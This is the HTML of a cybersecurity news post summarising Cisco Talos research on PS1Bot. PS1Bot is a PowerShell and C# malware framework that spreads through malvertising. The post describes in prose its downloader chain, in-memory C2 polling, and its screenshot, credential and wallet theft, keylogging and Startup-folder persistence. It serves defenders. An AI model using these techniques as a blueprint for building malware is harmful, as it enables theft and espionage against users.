Código HTML do Conteúdo
Post: PS1Bot: Multi-Stage Malware Framework Targeting Windows Systems - Against Invaders - Notícias de CyberSecurity para humanos.
<div>
<div>
<p>Cisco Talos researchers have uncovered an aggressive malware campaign active since early 2025, deploying a sophisticated multi-stage framework dubbed PS1Bot, primarily implemented in PowerShell and C#. </p>
<p>This threat actor leverages malvertising and SEO poisoning to distribute compressed archives with file names mimicking legitimate search queries, such as “chapter 8 medicare benefit policy manual.zip” or “pambu panchangam 2024-25 pdf.zip.” </p>
<p>Upon extraction, victims encounter a <a href="https://gbhackers.com/hackers-exploit-svg-files-with-embedded-javascript/" rel="noreferrer noopener" target="_blank">JavaScript file</a> named “FULL DOCUMENT.js,” which contains obfuscated VBScript acting as a downloader. </p>
<p>This script fetches a JScript scriptlet from an attacker-controlled server, initiating environmental setup by writing a PowerShell script to C:ProgramData (e.g., ntu.ps1) and executing it to poll a command-and-control (C2) server. </p>
<p>The polling mechanism derives a unique URL from the system’s C drive serial number, repeatedly invoking Invoke-Expression (IEX) to run retrieved PowerShell content in-memory, minimizing disk artifacts and enhancing stealth. </p>
<p>This modular design echoes prior threats like AHK Bot and overlaps with Skitnet infrastructure, including shared <a href="https://gbhackers.com/new-acrstealer-exploits-google-docs-and-steam/" rel="noreferrer noopener" target="_blank">C2 domains</a> and code patterns, suggesting evolutionary ties to these families without direct binary delivery observed in analyzed chains.</p>
<h2 id="h-advanced-modules-for-espionage-and-theft"><strong>Advanced Modules for Espionage and Theft</strong></h2>
<p>PS1Bot’s flexibility stems from its array of deployable modules, each tailored for specific malicious functions while incorporating runtime logging via HTTP GET requests with URL parameters for status updates. </p>
<p>An antivirus detection module queries Windows Management Instrumentation (WMI) to enumerate installed security products like Windows Defender, relaying results to the C2 for reconnaissance. </p>
<p>Following this, a screen capture module dynamically compiles C# code using PowerShell’s Add-Type cmdlet, generating in-memory assemblies to produce bitmap screenshots stored temporarily in %TEMP% and %APPDATA%, then Base64-encoded and exfiltrated via HTTP POST, with files promptly deleted to evade detection. </p>
<p>The “grabber” module, a potent information stealer, targets browser data from over 40 variants including Chrome, Edge, and Brave, alongside cryptocurrency extensions like MetaMask and Ledger, staging files in %TEMP% for compression and upload. </p>
<p>It extends to local wallet applications such as Exodus and Electrum, employing embedded wordlists spanning English, Czech, and crypto-specific seed phrases to scan file systems for sensitive documents matching criteria like extensions (.txt, .pdf) and sizes under 100KB, identifying passwords or wallet seeds for separate exfiltration. </p>
<p>Keylogging functionality mirrors this approach, compiling C# for SetWindowsHookEx() hooks to capture keystrokes, mouse events, and clipboard data, transmitting logs in HTTP POST bodies. </p>
<p>A system survey module, “WMIComputerCSHARP,” gathers domain details via WMI queries and environment variables, aiding in targeting high-value networks. </p>
<p>Persistence is achieved by creating randomized directories in %PROGRAMDATA%, housing obfuscated PowerShell scripts fetched from C2 paths like /transform, linked via LNK files in the Startup folder for reboot survival, complete with mutex handling to prevent duplicate executions.</p>
<h2 id="h-evolving-threat-landscape"><strong>Evolving Threat Landscape</strong></h2>
<p>Throughout 2025, PS1Bot has demonstrated rapid evolution, with frequent new samples and module updates observed, indicating active development. </p>
<p>Its in-memory execution and minimal persistence artifacts complicate forensic analysis, while overlaps with AHK Bot’s C2 derivation and modular polling, plus Skitnet’s PowerShell similarities, point to a maturing ecosystem of Windows-targeted threats. </p>
<p>According to the <a href="https://blog.talosintelligence.com/ps1bot-malvertising-campaign/" rel="noreferrer noopener nofollow" target="_blank">report</a>, Talos assesses high confidence in additional undisclosed modules, enabling adversaries to adapt swiftly for espionage, financial theft, or lateral movement.</p>
<p>Organizations should monitor for anomalous PowerShell activity, unusual WMI queries, and malvertising lures to mitigate this persistent campaign. </p>
<p><strong><code>AWS Security Services:10-Point Executive Checklist -<a href="https://underdefense.com/aws-security-services-10-point-executive-checklist/?utm_source=cybersecuritynews.com&utm_medium=online_media&utm_campaign=csn_linkedin_newsletter_aws_sec_check_aug" rel="noreferrer noopener nofollow" target="_blank">Download for Free</a></code></strong></p>
</div></div>